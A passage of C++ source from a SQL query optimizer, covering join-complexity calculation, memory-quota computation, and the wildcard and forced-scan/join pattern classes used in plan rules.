            // join or a TSJ i.e. two possible logical choices.
            if (expr->getOperator().match(REL_ANY_NON_TSJ_JOIN))
              child1Complexity = 2*child1Complexity ;
          }
          // add the right child subtree contribution to complexity
          result += child1Complexity;
        }
        // only REL_ANY_NON_TSJ_JOINs can permutate
        if (expr->getOperator().match(REL_ANY_NON_TSJ_JOIN))
          freeLeaves++;  // still in same permutation set
        else
        {
          // compute the last permuatation set contribution
          // to the complexity and start a new one
          result += freeLeaves * pow(2,freeLeaves-1);
          freeLeaves = 1; // start again
        }
      }
      // we do not handle VPJoin yet (nc==3)
      CascadesGroup* group0 =
        (*CURRSTMT_OPTGLOBALS->memo)[expr->child(0).getGroupId()];
      // Only one log expr exist in the group at this point
      expr = group0->getFirstLogExpr();
    }
    // leaf operators
    else
      expr = NULL;
  }
  // add last permutation set contribution
  result += freeLeaves * pow(2,freeLeaves-1);
  return result;
}

// calculate a query's MJ complexity,
// shoud be called after MJ rewrite
// n, n2, n3, n4 accumulate freeLeaves, freeLeaves^2, ^3 and ^4 over all
// multi-joins in the tree (in-out parameters).
double RelExpr::calculateQueryMJComplexity(double &n,double &n2,double &n3,double &n4)
{
  double result = 0;
  Int32 nc = getArity();
  Int32 freeLeaves = nc;  // # of subtree legs that can permutate
  RelExpr * expr = this;
  if (getOperatorType() == REL_MULTI_JOIN)
  {
    for (Int32 i = 0; i < nc; i++)
    {
      RelExpr * expri = expr->child(i);
      NABoolean childIsFullOuterJoinOrTSJ =
        child(i)->getGroupAnalysis()->getNodeAnalysis()->
          getJBBC()->isFullOuterJoinOrTSJJBBC();
      if (childIsFullOuterJoinOrTSJ)
      {
        // an outermost full-outer-join/TSJ child cannot permute,
        // so it does not count as a free leaf
        NABoolean childIsOuterMost =
          !(child(i)->getGroupAnalysis()->getNodeAnalysis()->
              getJBBC()->getOriginalParentJoin());
        if(childIsOuterMost)
          freeLeaves--;
      }
      result += expri->
        calculateQueryMJComplexity(n, n2, n3, n4);
    }
    //only do this for multijoins since only the children
    //of the multijoin will be permuted.
    //Note: This assumes the query tree to be the multijoinized
    //tree produced after multijoin rewrite in the Analyzer
    n += freeLeaves;
    n2 += pow(freeLeaves,2);
    n3 += pow(freeLeaves,3);
    n4 += pow(freeLeaves,4);
    result += freeLeaves * pow(2,freeLeaves-1);
  }
  else if(nc > 0)
  {
    if (nc == 1)
    {
      RelExpr * expr0 = expr->child(0);
      result += expr0->
        calculateQueryMJComplexity(n, n2, n3, n4);
    }
    else if (nc == 2)
    {
      // only for joins, not for union
      // these will only be TSJ or Full Outer Joins
      // other joins become part of JBB
      if (expr->getOperator().match(REL_ANY_JOIN))
      {
        RelExpr * expr0 = expr->child(0);
        result += expr0->calculateQueryMJComplexity(n, n2, n3, n4);
        RelExpr * expr1 = expr->child(1);
        result += expr1->calculateQueryMJComplexity(n, n2, n3, n4);
      }
    }
  }
  return result;
}

// -----------------------------------------------------------------------
// the following method is used to created a list of all scan operators
// in order by size.
// The "size" inserted is an estimated result size in KB
// (cardinality * record length / 1024); entries of 1KB or less are
// skipped.
// -----------------------------------------------------------------------
void RelExpr::makeListBySize(LIST(CostScalar) & orderedList, // order list of size
                             NABoolean recompute)  // recompute memory
                                                   // limit -not used
{
  Int32 nc = getArity();
  RelExpr * expr = this;
  CostScalar size = 0;

  if (recompute)
  {
    // this needs to be filled in if this ever is redriven by costing
    CMPASSERT(NOT recompute);
  }
  else
  {
    if (expr->getOperatorType() == REL_SCAN OR
        expr->getOperatorType() == REL_GROUPBY)
    {
      //++MV, use the global empty input logical properties instead of
      //initializing a new one
      size = expr->getGroupAttr()->outputLogProp((*GLOBAL_EMPTY_INPUT_LOGPROP))->getResultCardinality() *
             expr->getGroupAttr()->getRecordLength() / 1024;
    }
  }

  if (size > 1) // don't include anything 1KB or less
  {
    CollIndex idx = 0;
    for (idx = 0; idx < orderedList.entries(); idx++)
    {
      // list should be ordered by increasing estimated rowcount.
      // NOTE(review): the list actually holds estimated sizes in KB,
      // not rowcounts -- comment appears stale; ordering is ascending.
if (orderedList[idx] >= size)
      {
        orderedList.insertAt (idx, size);
        break;
      }
    }
    // insert at end of list
    if (idx >= orderedList.entries())
    {
      orderedList.insertAt (orderedList.entries(), size);
    }
  }

  // recurse into each child group's (single) logical expression
  for (Lng32 i = 0; i < nc; i++)
  {
    CascadesGroup* group1 =
      (*CURRSTMT_OPTGLOBALS->memo)[expr->child(i).getGroupId()];
    // Only one log expr exist in the group at this point
    // if onlyMemoryOps is ever set true, we will have to traverse
    // the tree differently
    RelExpr * expr1 = group1->getFirstLogExpr();
    expr1->makeListBySize(orderedList, recompute);
  }
}

// Default implementation every RelExpr returns normal priority
PlanPriority RelExpr::computeOperatorPriority
(const Context* context,
 PlanWorkSpace *pws,
 Lng32 planNumber)
{
  PlanPriority result; // This will create normal plan priority
  return result;
}

// -----------------------------------------------------------------------
// Method for debugging
// Dumps this expression, its predicates and (recursively) its children;
// compiled out in release (NDEBUG) builds.
// -----------------------------------------------------------------------
void RelExpr::print(FILE * f,
                    const char * prefix,
                    const char * suffix) const
{
#ifndef NDEBUG
  ExprNode::print(f,prefix,suffix);
  fprintf(f,"%sRelational Expression:\n",prefix);
  if (selection_ != NULL)
    selection_->print(f,prefix,suffix);
  else
    predicates_.print(f,prefix,suffix);

  // print children or input equivalence classes
  Int32 nc = getArity();
  for (Lng32 i = 0; i < nc; i++)
  {
    fprintf(f,"%sExpression input %d:\n",prefix,i);
    if (child(i).getMode() == ExprGroupId::MEMOIZED)
    {
      fprintf(f, "%s input eq. class #%d\n",
              prefix, child(i).getGroupId());
    }
    else
    {
      if (child(i).getPtr() != NULL)
        child(i)->print(f,CONCAT(prefix," "));
      else
        fprintf(f,"%snonexistent child\n",prefix);
    }
  }
#endif
}

// Count this node plus all nodes reachable through non-NULL children.
Int32 RelExpr::nodeCount() const
{
  Int32 result = 1; // start from me.
  Int32 nc = getArity();
  for (Lng32 i = 0; i < nc; i++)
    if (child(i).getPtr() != NULL)
      result += child(i)->nodeCount();
  return result;
}

// TRUE iff this node or any descendant has the given operator type.
NABoolean RelExpr::containsNode(OperatorTypeEnum nodeType)
{
  if (getOperatorType() == nodeType)
    return TRUE;

  Int32 nc = getArity();
  for (Int32 i = 0; i < nc; i++)
  {
    if (child(i).getPtr() != NULL &&
        child(i)->containsNode(nodeType))
      return TRUE;
  }

  return FALSE;
}

// Compute this BMO operator's memory quota.
// perNode==TRUE: split the node-wide limit into a constant share (equal
// across BMOs, capped by CQD BMO_MEMORY_EQUAL_QUOTA_SHARE_RATIO) plus a
// share proportional to this BMO's estimated usage, then divide by the
// number of instances per node. Otherwise fall back to the old scheme:
// available memory divided by BMOs per fragment.
double RelExpr::computeMemoryQuota(NABoolean inMaster,
                                   NABoolean perNode,
                                   double BMOsMemoryLimit, // in MB
                                   UInt16 totalNumBMOs, // per query
                                   double totalBMOsMemoryUsage, // for all BMOs per node in bytes
                                   UInt16 numBMOsPerFragment, // per fragment
                                   double bmoMemoryUsage, // for the current BMO/Operator per node in bytes
                                   Lng32 numStreams,
                                   double &bmoQuotaRatio
                                  )
{
  if ( perNode == TRUE ) {
     Lng32 exeMem = Lng32(BMOsMemoryLimit/(1024*1024));
     // the quota is allocated in 2 parts
     // The constant part divided equally across all bmo operators
     // The variable part allocated in proportion of the given BMO operator
     // estimated memory usage to the total estimated memory usage of all BMOs
     // The ratio can be capped by the CQD
     double equalQuotaShareRatio = 0;
     equalQuotaShareRatio = ActiveSchemaDB()->getDefaults().getAsDouble(BMO_MEMORY_EQUAL_QUOTA_SHARE_RATIO);
     double constMemQuota = 0;
     double variableMemLimit = exeMem;
     if (equalQuotaShareRatio > 0 && totalNumBMOs > 1) {
        constMemQuota = (exeMem * equalQuotaShareRatio )/ totalNumBMOs;
        variableMemLimit = (1-equalQuotaShareRatio) * exeMem;
     }
     double bmoMemoryRatio = bmoMemoryUsage / totalBMOsMemoryUsage;
     bmoQuotaRatio = bmoMemoryRatio;
     double bmoMemoryQuotaPerNode = constMemQuota + (variableMemLimit * bmoMemoryRatio);
     // NOTE(review): cast to NAClusterInfoLinux* assumes a Linux cluster
     // info object -- TODO confirm this is the only concrete type here.
     double numInstancesPerNode = numStreams / MINOF(MAXOF(((NAClusterInfoLinux*)gpClusterInfo)->getTotalNumberOfCPUs(), 1), numStreams);
     double bmoMemoryQuotaPerInstance = bmoMemoryQuotaPerNode / numInstancesPerNode;
     return bmoMemoryQuotaPerInstance;
  }
  else {
     // the old way to compute quota
     Lng32 exeMem =
getExeMemoryAvailable(inMaster);
     bmoQuotaRatio = BMOQuotaRatio::NO_RATIO;
     return exeMem / numBMOsPerFragment;
  }
}

// Returns the executor memory available in MB, taken from the
// EXE_MEMORY_AVAILABLE_IN_MB default (inMaster is currently unused here).
Lng32 RelExpr::getExeMemoryAvailable(NABoolean inMaster) const
{
  Lng32 exeMemAvailMB = ActiveSchemaDB()->getDefaults().getAsLong(EXE_MEMORY_AVAILABLE_IN_MB);
  return exeMemAvailMB;
}

// -----------------------------------------------------------------------
// methods for class RelExprList
// -----------------------------------------------------------------------

// Insert expr into the list ordered by estimated cardinality
// (ascending or descending depending on CQD COMP_INT_90); stream and
// embedded update/delete expressions are forced to the front.
void RelExprList::insertOrderByRowcount (RelExpr * expr)
{
  Int32 i = 0;
  NABoolean done = FALSE;

  // QSTUFF
  // insert stream expression as the left most expression
  // by articially forcing it to have lowest cost
  // assumes that only one stream and one embedded update clause
  // is in the statement
  if (expr->getGroupAttr()->isStream() ||
      expr->getGroupAttr()->isEmbeddedUpdateOrDelete())
  {
    insertAt(0,expr);
    done = TRUE;
  }
  // QSTUFF

  while (!done && i < (Int32)entries())
  {
    CostScalar thisCard = (*this)[i]->
                            getGroupAttr()->
                              getResultCardinalityForEmptyInput();
    CostScalar exprCard = expr->
                            getGroupAttr()->
                              getResultCardinalityForEmptyInput();

    NABoolean increasing =
      ((ActiveSchemaDB()->getDefaults()).getAsULong(COMP_INT_90)==1);
    // list should be ordered by increasing estimated rowcount.
    if (((thisCard >= exprCard ) && increasing) ||
        ((thisCard < exprCard ) && !increasing))
    {
      // QSTUFF
      // stream and nested updates or deletes expressions should always be
      // left most, i.e of lowest cost
      if ( (*this)[i]->getGroupAttr()->isStream() ||
           (*this)[i]->getGroupAttr()->isEmbeddedUpdateOrDelete())
        i++;
      // QSTUFF
      insertAt (i, expr);
      done = TRUE;
    }
    else
      i++;
  }

  // insert at end of list
  if (!done)
    insertAt (entries(), expr);
}

// Element-wise pointer equality of two lists.
NABoolean RelExprList::operator== (const RelExprList &other) const
{
  if (entries() != other.entries())
    return FALSE;

  for (Lng32 i = 0; i < (Lng32)entries(); i++)
  {
    if ((*this)[i] != other[i])
      return FALSE;
  }
  return TRUE;
}

NABoolean RelExprList::operator!= (const RelExprList &other) const
{
  if ((*this) == other)
    return FALSE;
  else
    return TRUE;
}

// -----------------------------------------------------------------------
// methods for class CutOp
// -----------------------------------------------------------------------
CutOp::~CutOp() {}

// Debug dump; compiled out in release (NDEBUG) builds.
void CutOp::print(FILE * f, const char * prefix, const char *) const
{
#ifndef NDEBUG
  if (getGroupId() == INVALID_GROUP_ID)
    fprintf(f, "%sLeaf (%d)\n", prefix, index_);
  else
    fprintf(f, "%sLeaf (%d, bound to group #%d)\n",
            prefix, index_, getGroupId());
  return;
#endif
}

Int32 CutOp::getArity () const { return 0; }

NABoolean CutOp::isCutOp() const { return TRUE; }

const NAString CutOp::getText() const
{
  char theText[TEXT_DISPLAY_LENGTH];

  if (getGroupId() == INVALID_GROUP_ID)
    sprintf(theText, "Cut (%d)", index_);
  else if (index_ < 99)
    sprintf(theText, "Cut (%d, #%d)", index_, getGroupId());
  else
    // don't display funny indexes (>= 99)
    sprintf(theText, "Cut (#%d)", getGroupId());

  return NAString(theText);
}

RelExpr * CutOp::copyTopNode(RelExpr * derivedNode, CollHeap* outHeap)
{
  if (getGroupId() == INVALID_GROUP_ID)
  {
    // this is a standalone cut operator (e.g.
in the tree of a
    // CONTROL QUERY SHAPE directive), return a copy of it
    CMPASSERT(derivedNode == NULL);
    CutOp* result = new (outHeap)CutOp(index_, outHeap);
    return RelExpr::copyTopNode(result,outHeap);
  }
  else
  {
    // CutOps are shared among the pattern and the substitute of
    // a rule. Often the substitute is produced by calling the copyTree()
    // method on the "before" expression or a part of it. This implementation
    // of copyTopNode() makes it possible to do that.
    return this;
  }
}

// Bind this leaf to a memo group and take on that group's attributes
// (or clear both for INVALID_GROUP_ID).
void CutOp::setGroupIdAndAttr(CascadesGroupId groupId)
{
  setGroupId(groupId);

  // set the group attributes of the leaf node to match the group
  if (groupId == INVALID_GROUP_ID)
    setGroupAttr(NULL);
  else
    setGroupAttr((*CURRSTMT_OPTGLOBALS->memo)[groupId]->getGroupAttr());
}

void CutOp::setExpr(RelExpr *e)
{
  expr_ = e;

  if (expr_ == NULL)
  {
    setGroupIdAndAttr(INVALID_GROUP_ID);
  }
  else
  {
    setGroupAttr(expr_->getGroupAttr());
    // ##shouldn't this line..
    // setGroupIdAndAttr(expr_->getGroupId());
    // ##..be replaced by this?
  }
}

// -----------------------------------------------------------------------
// methods for class SubtreeOp
// -----------------------------------------------------------------------
SubtreeOp::~SubtreeOp() {}
Int32 SubtreeOp::getArity() const { return 0; }
NABoolean SubtreeOp::isSubtreeOp() const { return TRUE; }
const NAString SubtreeOp::getText() const { return NAString("Tree Op"); }
// SubtreeOps are shared, never copied.
RelExpr * SubtreeOp::copyTopNode(RelExpr *, CollHeap*) { return this; }

// -----------------------------------------------------------------------
// methods for class WildCardOp
// -----------------------------------------------------------------------
WildCardOp::~WildCardOp() {}

// Arity is derived from the wildcard's operator type:
// leaf wildcards -> 0, unary -> 1, binary/join wildcards -> 2.
Int32 WildCardOp::getArity() const
{
  switch (getOperatorType())
  {
    case REL_ANY_LEAF_OP:
    case REL_FORCE_ANY_SCAN:
    case REL_ANY_ROUTINE:
    case REL_FORCE_ANY_SCALAR_UDF:
    case REL_ANY_SCALAR_UDF_ROUTINE:
    case REL_ANY_LEAF_GEN_UPDATE:
    case REL_ANY_LEAF_TABLE_MAPPING_UDF:
      return 0;
    case REL_ANY_UNARY_GEN_UPDATE:
    case REL_ANY_UNARY_OP:
    case REL_ANY_GROUP:
    case REL_FORCE_EXCHANGE:
    case REL_ANY_UNARY_TABLE_MAPPING_UDF:
      return 1;
    case REL_ANY_BINARY_OP:
    case REL_ANY_JOIN:
    case REL_ANY_TSJ:
    case REL_ANY_SEMIJOIN:
    case REL_ANY_SEMITSJ:
    case REL_ANY_ANTI_SEMIJOIN:
    case REL_ANY_ANTI_SEMITSJ:
    case REL_ANY_INNER_JOIN:
    case REL_ANY_NON_TS_INNER_JOIN:
    case REL_ANY_NON_TSJ_JOIN:
    case REL_ANY_LEFT_JOIN:
    case REL_ANY_LEFT_TSJ:
    case REL_ANY_NESTED_JOIN:
    case REL_ANY_HASH_JOIN:
    case REL_ANY_MERGE_JOIN:
    case REL_FORCE_JOIN:
    case REL_FORCE_NESTED_JOIN:
    case REL_FORCE_HASH_JOIN:
    case REL_FORCE_ORDERED_HASH_JOIN:
    case REL_FORCE_HYBRID_HASH_JOIN:
    case REL_FORCE_MERGE_JOIN:
    case REL_FORCE_ORDERED_CROSS_PRODUCT:
    case REL_ANY_BINARY_TABLE_MAPPING_UDF:
      return 2;
    default:
      ABORT("WildCardOp with unknown arity encountered");
      return 0;
  }
}

NABoolean WildCardOp::isWildcard() const { return TRUE; }

const NAString WildCardOp::getText() const
{
  switch (getOperatorType())
  {
    case ANY_REL_OR_ITM_OP:
      return "ANY_REL_OR_ITM_OP";
    case REL_ANY_LEAF_OP:
      return "REL_ANY_LEAF_OP";
    case REL_ANY_UNARY_OP:
      return "REL_ANY_UNARY_OP";
    case REL_ANY_ROUTINE:
      return "REL_ANY_ROUTINE";
    case REL_ANY_GEN_UPDATE:
      return "REL_ANY_GEN_UPDATE";
    case REL_ANY_UNARY_GEN_UPDATE:
      return "REL_ANY_UNARY_GEN_UPDATE";
    case REL_ANY_LEAF_GEN_UPDATE:
      return "REL_ANY_LEAF_GEN_UPDATE";
    case REL_ANY_GROUP:
      return "REL_ANY_GROUP";
    case REL_ANY_BINARY_OP:
      return "REL_ANY_BINARY_OP";
    case REL_ANY_JOIN:
      return "REL_ANY_JOIN";
    case REL_ANY_TSJ:
      return "REL_ANY_TSJ";
    case REL_ANY_SEMIJOIN:
      return "REL_ANY_SEMIJOIN";
    case REL_ANY_SEMITSJ:
      return "REL_ANY_SEMITSJ";
    case REL_ANY_INNER_JOIN:
      return "REL_ANY_INNER_JOIN";
    case REL_ANY_LEFT_JOIN:
      return "REL_ANY_LEFT_JOIN";
    case REL_ANY_LEFT_TSJ:
      return "REL_ANY_LEFT_TSJ";
    case REL_ANY_NESTED_JOIN:
      return "REL_ANY_NESTED_JOIN";
    case REL_ANY_HASH_JOIN:
      return "REL_ANY_HASH_JOIN";
    case REL_ANY_MERGE_JOIN:
      return "REL_ANY_MERGE_JOIN";
    case REL_FORCE_ANY_SCAN:
      return "REL_FORCE_ANY_SCAN";
    case REL_FORCE_EXCHANGE:
      return "REL_FORCE_EXCHANGE";
    case REL_FORCE_JOIN:
      return "REL_FORCE_JOIN";
    case REL_FORCE_NESTED_JOIN:
      return "REL_FORCE_NESTED_JOIN";
    case REL_FORCE_HASH_JOIN:
      return "REL_FORCE_HASH_JOIN";
    case REL_FORCE_HYBRID_HASH_JOIN:
      return "REL_FORCE_HYBRID_HASH_JOIN";
    case REL_FORCE_ORDERED_HASH_JOIN:
      return "REL_FORCE_ORDERED_HASH_JOIN";
    case REL_FORCE_MERGE_JOIN:
      return "REL_FORCE_MERGE_JOIN";
    default:
      return "unknown??";
  }
}

RelExpr * WildCardOp::copyTopNode(RelExpr * derivedNode,
                                  CollHeap* outHeap)
{
  if (corrNode_ != NULL)
    return corrNode_->copyTopNode(0, outHeap);
  else
  {
    if (derivedNode != NULL)
      return derivedNode;
    else
    {
      WildCardOp* result;
      result = new (outHeap) WildCardOp(getOperatorType(), 0, NULL, NULL, outHeap);
      return RelExpr::copyTopNode(result,outHeap);
    }
  }
  return NULL; // shouldn't really reach here
}

// -----------------------------------------------------------------------
// member functions for class ScanForceWildCard
// -----------------------------------------------------------------------
ScanForceWildCard::ScanForceWildCard(CollHeap * outHeap)
  : WildCardOp(REL_FORCE_ANY_SCAN),
    exposedName_(outHeap),
    indexName_(outHeap)
{initializeScanOptions();}

ScanForceWildCard::ScanForceWildCard(const NAString& exposedName, CollHeap *outHeap)
  : WildCardOp(REL_FORCE_ANY_SCAN,0,NULL,NULL,outHeap),
    exposedName_(exposedName, outHeap),
    indexName_(outHeap)
{initializeScanOptions();}

ScanForceWildCard::ScanForceWildCard(const NAString& exposedName,
                                     const NAString& indexName,
                                     CollHeap *outHeap)
  : WildCardOp(REL_FORCE_ANY_SCAN,0,NULL,NULL,outHeap),
    exposedName_(exposedName, outHeap),
    indexName_(indexName, outHeap)
{initializeScanOptions();}

ScanForceWildCard::~ScanForceWildCard()
{
  collHeap()->deallocateMemory((void*)enumAlgorithms_);
  // delete enumAlgorithms_ from the same heap were the
  // ScanForceWildCard object belong
}

//----------------------------------------------------------
// initialize class members
//----------------------------------------------------------
void ScanForceWildCard::initializeScanOptions()
{
  mdamStatus_ = UNDEFINED;
  direction_ = UNDEFINED;
  indexStatus_ = UNDEFINED;
  numMdamColumns_ = 0;
  mdamColumnsStatus_ = UNDEFINED;
  enumAlgorithms_ = NULL;
  numberOfBlocksToReadPerAccess_ = -1;  // -1 means "not forced"
}

//----------------------------------------------------------
// get the enumeration algorithm (density) for column
// if beyound specified columns return COLUMN_SYSTEM
//----------------------------------------------------------
ScanForceWildCard::scanOptionEnum
ScanForceWildCard::getEnumAlgorithmForColumn(CollIndex column) const
{
  if (column >= numMdamColumns_)
    return ScanForceWildCard::COLUMN_SYSTEM;
  else
    return enumAlgorithms_[column];
}

//----------------------------------------------------------
// set the following scan option. return FALSE only if
// such option does not exist.
//----------------------------------------------------------
NABoolean ScanForceWildCard::setScanOptions(ScanForceWildCard::scanOptionEnum option)
{
  if (option == INDEX_SYSTEM)
  {
    indexStatus_ = INDEX_SYSTEM;
    return TRUE;
  }
  else if (option == MDAM_SYSTEM)
  {
    mdamStatus_ = MDAM_SYSTEM;
    return TRUE;
  }
  else if (option == MDAM_OFF)
  {
    mdamStatus_ = MDAM_OFF;
    return TRUE;
  }
  else if (option == MDAM_FORCED)
  {
    mdamStatus_ = MDAM_FORCED;
    return TRUE;
  }
  else if (option == DIRECTION_FORWARD)
  {
    direction_ = DIRECTION_FORWARD;
    return TRUE;
  }
  else if (option == DIRECTION_REVERSED)
  {
    direction_ = DIRECTION_REVERSED;
    return TRUE;
  }
  else if (option == DIRECTION_SYSTEM)
  {
    direction_ = DIRECTION_SYSTEM;
    return TRUE;
  }
  else
    return FALSE;
}

// Set the forced index name; rejects the empty string.
NABoolean ScanForceWildCard::setIndexName(const NAString& value)
{
  if (value != "")
  {
    indexName_ = value;
    return TRUE;
  }
  else
    return FALSE; // Error should be nonempty string
}

//----------------------------------------------------------
// set the columns options based on passed values
//----------------------------------------------------------
NABoolean ScanForceWildCard::
setColumnOptions(CollIndex numColumns,
                 ScanForceWildCard::scanOptionEnum* columnAlgorithms,
                 ScanForceWildCard::scanOptionEnum mdamColumnsStatus)
{
  mdamStatus_ = MDAM_FORCED;  // forcing column options implies forcing MDAM
  mdamColumnsStatus_ = mdamColumnsStatus;
  numMdamColumns_ = numColumns;
  // delete enumAlgorithms_ from the same heap were the
  // ScanForceWildCard object belong
  collHeap()->deallocateMemory((void*)enumAlgorithms_);
  // allocate enumAlgorithms_[numMdamColumns] in the same heap
  // were the ScanForceWildCard object belong
  enumAlgorithms_ = (ScanForceWildCard::scanOptionEnum*)
    collHeap()->allocateMemory(sizeof(ScanForceWildCard::scanOptionEnum)*numMdamColumns_);
  for (CollIndex i=0; i<numMdamColumns_; i++)
    enumAlgorithms_[i] = columnAlgorithms[i];
  return TRUE;
}

//----------------------------------------------------------
// set the columns options based on passed values
// here options for particular columns are not passed
// and hence COLUMN_SYSTEM is assigned
//----------------------------------------------------------
NABoolean ScanForceWildCard::
setColumnOptions(CollIndex numColumns,
                 ScanForceWildCard::scanOptionEnum mdamColumnsStatus)
{
  mdamStatus_ = MDAM_FORCED;  // forcing column options implies forcing MDAM
  mdamColumnsStatus_ = mdamColumnsStatus;
  numMdamColumns_ = numColumns;
  // delete enumAlgorithms_ from the same heap were the
  // ScanForceWildCard object belong
  collHeap()->deallocateMemory((void*)enumAlgorithms_);
  // allocate enumAlgorithms_[numMdamColumns] in the same heap
  // were the ScanForceWildCard object belong
  enumAlgorithms_ = (ScanForceWildCard::scanOptionEnum*)
    collHeap()->allocateMemory(sizeof(ScanForceWildCard::scanOptionEnum)*numMdamColumns_);
  //enumAlgorithms_ = new scanOptionEnum[numMdamColumns_];
  for (CollIndex i=0; i<numMdamColumns_; i++)
    enumAlgorithms_[i] = COLUMN_SYSTEM;
  return TRUE;
}

//----------------------------------------------------------
// check if the forced scan options conflict with the Mdam
// Master switch status
// NOTE(review): method name has a typo ("Coflict" for "Conflict");
// it is part of the public interface so it is not renamed here.
//----------------------------------------------------------
NABoolean ScanForceWildCard::doesThisCoflictMasterSwitch() const
{
char* globalMdamStatus = getenv("MDAM");
  // The MDAM master switch is read from the process environment;
  // MDAM=OFF conflicts with any option that forces or allows MDAM.
  if (globalMdamStatus != NULL)
  {
    if (strcmp(globalMdamStatus,"OFF")==0 )
    {
      if ((mdamStatus_ == MDAM_FORCED)||(mdamStatus_ == MDAM_SYSTEM))
        return TRUE;
    }
  }
  return FALSE;
}

//----------------------------------------------------------
// merge with another ScanForceWildCard object.
// return FALSE if a conflict between the options of
// the two objects exists.
// Merging is field-wise: an UNDEFINED field takes the other
// object's value; two different defined values conflict.
//----------------------------------------------------------
NABoolean ScanForceWildCard::mergeScanOptions(const ScanForceWildCard &other)
{
  if ((other.exposedName_ != "")
      &&(other.exposedName_ != exposedName_))
  {
    if (exposedName_ == "")
    {
      exposedName_ = other.exposedName_;
    }
    else
      return FALSE; // conflict
  }

  if ((other.indexName_ != "")
      &&(other.indexName_ != indexName_))
  {
    if (indexName_ == "")
    {
      indexName_ = other.indexName_;
    }
    else
      return FALSE; // conflict
  }

  if (other.indexStatus_ == INDEX_SYSTEM)
  {
    indexStatus_ = INDEX_SYSTEM;
  }
  if (indexStatus_ == INDEX_SYSTEM)
  {
    // a system-chosen index cannot coexist with an explicit index name
    if (indexName_ != "")
      return FALSE; // conflict
  }

  if ((other.mdamStatus_ == MDAM_OFF)
      &&(mdamStatus_ != MDAM_OFF))
  {
    if (mdamStatus_ == UNDEFINED)
    {
      mdamStatus_ = other.mdamStatus_;
    }
    else
      return FALSE; // conflict
  }
  if ((other.mdamStatus_ == MDAM_SYSTEM)
      &&(mdamStatus_ != MDAM_SYSTEM))
  {
    if (mdamStatus_ == UNDEFINED)
    {
      mdamStatus_ = other.mdamStatus_;
    }
    else
      return FALSE; // conflict
  }
  if ((other.mdamStatus_ == MDAM_FORCED)
      &&(mdamStatus_ != MDAM_FORCED))
  {
    if (mdamStatus_ == UNDEFINED)
    {
      mdamStatus_ = other.mdamStatus_;
    }
    else
      return FALSE; // conflict
  }

  if (other.numMdamColumns_ > 0)
  {
    if ((mdamStatus_ == UNDEFINED)||(mdamStatus_ == MDAM_FORCED))
    {
      if (numMdamColumns_ == other.numMdamColumns_)
      {
        for (CollIndex i=0; i<numMdamColumns_; i++)
        {
          if (enumAlgorithms_[i] != other.enumAlgorithms_[i])
            return FALSE; // conflict
        }
        if (other.mdamColumnsStatus_ != mdamColumnsStatus_)
          return FALSE; // conflict
      }
      else if (numMdamColumns_ == 0) // i.e. enumAlgorithm is NULL
      {
        numMdamColumns_ = other.numMdamColumns_;
        collHeap()->deallocateMemory((void*)enumAlgorithms_);
        //delete enumAlgorithms_;
        enumAlgorithms_ = (ScanForceWildCard::scanOptionEnum*)
          collHeap()->allocateMemory(sizeof(ScanForceWildCard::scanOptionEnum)*numMdamColumns_);
        //enumAlgorithms_ = new scanOptionEnum[numMdamColumns_];
        for (CollIndex i=0; i<numMdamColumns_; i++)
        {
          enumAlgorithms_[i] = other.enumAlgorithms_[i];
        }
      }
      else
        return FALSE; // coflict
    }
    else
      return FALSE; // conflict
  }

  if (other.mdamColumnsStatus_ != UNDEFINED)
  {
    if (mdamColumnsStatus_ == UNDEFINED)
    {
      mdamColumnsStatus_ = other.mdamColumnsStatus_;
    }
    if (mdamColumnsStatus_ != other.mdamColumnsStatus_)
    {
      return FALSE; // conflict
    }
  }

  if ((other.direction_ == DIRECTION_FORWARD)
      &&(direction_ != DIRECTION_FORWARD))
  {
    if (direction_ == UNDEFINED)
    {
      direction_ = other.direction_;
    }
    else
      return FALSE; // conflict
  }
  if ((other.direction_ == DIRECTION_REVERSED)
      &&(direction_ != DIRECTION_REVERSED))
  {
    if (direction_ == UNDEFINED)
    {
      direction_ = other.direction_;
    }
    else
      return FALSE; // conflict
  }
  if ((other.direction_ == DIRECTION_SYSTEM)
      &&(direction_ != DIRECTION_SYSTEM))
  {
    if (direction_ == UNDEFINED)
    {
      direction_ = other.direction_;
    }
    else
      return FALSE; // conflict
  }

  if (other.numberOfBlocksToReadPerAccess_ > 0)
  {
    numberOfBlocksToReadPerAccess_ = other.numberOfBlocksToReadPerAccess_;
  }

  return TRUE;
}

//----------------------------------------------------------
// if access path is not given then the default is ANY i.e
// system choice unless MDAM is forced then the default is
// the base table.
//---------------------------------------------------------- void ScanForceWildCard::prepare() { if (mdamStatus_ != ScanForceWildCard::MDAM_FORCED) { if (indexName_ == "") { indexStatus_ = ScanForceWildCard::INDEX_SYSTEM; } } else // mdam is forced { if ((indexName_ == "") && (indexStatus_ != ScanForceWildCard::INDEX_SYSTEM)) { indexName_ = exposedName_; } } if (mdamColumnsStatus_ == ScanForceWildCard::UNDEFINED) { mdamColumnsStatus_ = ScanForceWildCard::MDAM_COLUMNS_REST_BY_SYSTEM; } return; } RelExpr * ScanForceWildCard::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { ScanForceWildCard *temp; if (derivedNode != NULL) ABORT("No support for classes derived from ScanForceWildcard"); temp = new (outHeap) ScanForceWildCard(exposedName_,indexName_,outHeap); temp->direction_ = direction_; temp->indexStatus_ = indexStatus_; temp->mdamStatus_ = mdamStatus_; temp->mdamColumnsStatus_ = mdamColumnsStatus_; temp->numMdamColumns_ = numMdamColumns_; temp->numberOfBlocksToReadPerAccess_ = numberOfBlocksToReadPerAccess_; temp->enumAlgorithms_ = new (outHeap) scanOptionEnum[numMdamColumns_]; for (CollIndex i=0; i<numMdamColumns_; i++) { temp->enumAlgorithms_[i]=enumAlgorithms_[i]; } RelExpr *result = temp; WildCardOp::copyTopNode(result,outHeap); return result; } const NAString ScanForceWildCard::getText() const { NAString result("forced scan", CmpCommon::statementHeap()); if (exposedName_ != "") { result += "("; result += exposedName_; if (indexName_ != "") { result += ", index "; result += indexName_; } result += ")"; } return result; } // ----------------------------------------------------------------------- // member functions for class JoinForceWildCard // ----------------------------------------------------------------------- JoinForceWildCard::JoinForceWildCard(OperatorTypeEnum type, RelExpr *child0, RelExpr *child1, forcedPlanEnum plan, Int32 numOfEsps, CollHeap *outHeap) : WildCardOp(type, 0, child0, child1,outHeap) { plan_ = plan; numOfEsps_ = numOfEsps; } 
JoinForceWildCard::~JoinForceWildCard() {}

// Deep-copy this forced-join wildcard (children are NOT copied).
// Derived classes are not supported.
RelExpr * JoinForceWildCard::copyTopNode(RelExpr *derivedNode,
                                         CollHeap* outHeap)
{
  RelExpr *result;
  if (derivedNode != NULL)
